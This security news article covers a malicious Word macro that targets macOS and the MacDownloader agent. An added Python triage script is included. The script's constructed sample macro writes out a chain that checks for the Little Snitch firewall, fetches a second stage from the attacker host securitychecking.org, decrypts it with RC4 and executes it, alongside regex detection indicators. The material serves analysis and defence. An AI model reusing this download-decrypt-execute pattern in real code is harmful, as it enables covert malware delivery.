macOS Under Attack
Researchers have discovered a Microsoft Word macro that can compromise macOS systems. Researchers at Objective-See found that the Microsoft Word file titled “U.S. Allies and Rivals Digest Trump's Victory – Carnegie Endowment for International Peace” contains malicious macros.
According to the research firm Objective-See, when a user opens the malicious file, Word shows the usual macro warning; the macro then checks that the Little Snitch firewall is not running on the system. It then tries to download a second-stage payload from https://www.securitychecking.org:443/index.asp, decrypts that payload with RC4 and executes the decrypted result.
Unfortunately, by the time researchers found out about the problem, securitychecking.org had become inaccessible, so it is not clear what the second-stage payload was. However, because the macro code is based on EmPyre, the researchers believe it could be the second-stage component of EmPyre, a persistent agent that gives a remote attacker continued access to an infected host.
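As an added illustration (not code from the Objective-See write-up), the following Python triage helper flags the behaviours the article lists in extracted macro text: a Little Snitch check, a fetch from the second-stage host, RC4 decryption and runtime execution. The sample macro bodies and the indicator patterns are constructed assumptions for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample macro text that mirrors the chain the article describes
# (firewall check, download, RC4 decrypt, execute); not the real document's code.
SUSPICIOUS_MACRO = """
Sub AutoOpen()
    ' bail out if the Little Snitch firewall is running
    If InStr(Shell("ps aux"), "Little Snitch") > 0 Then Exit Sub
    stage = urlopen("https://www.securitychecking.org:443/index.asp").read()
    exec(rc4(key, stage))
End Sub
"""

# Constructed benign macro for comparison: formatting only, no network or exec.
BENIGN_MACRO = """
Sub FormatHeadings()
    Selection.Font.Bold = True
    Selection.ParagraphFormat.Alignment = wdAlignParagraphCenter
End Sub
"""

# Each indicator: name, case-insensitive pattern, and what a hit suggests.
INDICATORS: List[Tuple[str, str, str]] = [
    ("firewall_check", r"little\s*snitch", "probes for Little Snitch before acting"),
    ("stage2_download", r"urlopen|securitychecking\.org", "fetches a second-stage payload"),
    ("rc4_decrypt", r"\brc4\b", "decrypts the payload with RC4"),
    ("runtime_exec", r"\b(exec|eval)\s*\(", "executes decoded code at runtime"),
]

# The three behaviours that together form the download-decrypt-execute chain.
CHAIN = ("stage2_download", "rc4_decrypt", "runtime_exec")


def triage_macro(text: str) -> Dict[str, object]:
    """Return the indicators hit in one macro body and whether the full chain is present."""
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, text, re.I)]
    return {"hits": hits, "download_decrypt_execute": all(n in hits for n in CHAIN)}


if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS_MACRO), ("benign", BENIGN_MACRO)):
        print(label, triage_macro(body))
```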
This is the second macOS infection reported in the same week. Earlier, researchers at Iran Threats found a macOS agent called MacDownloader that targeted the defense industrial base and a human rights advocate.
According to the GitHub page of Iran Threats, “MacDownloader strangely attempts to pose as both an installer for Adobe Flash, as well as the Bitdefender Adware Removal Tool, in order to extract system information and copies of OS X keychain databases.”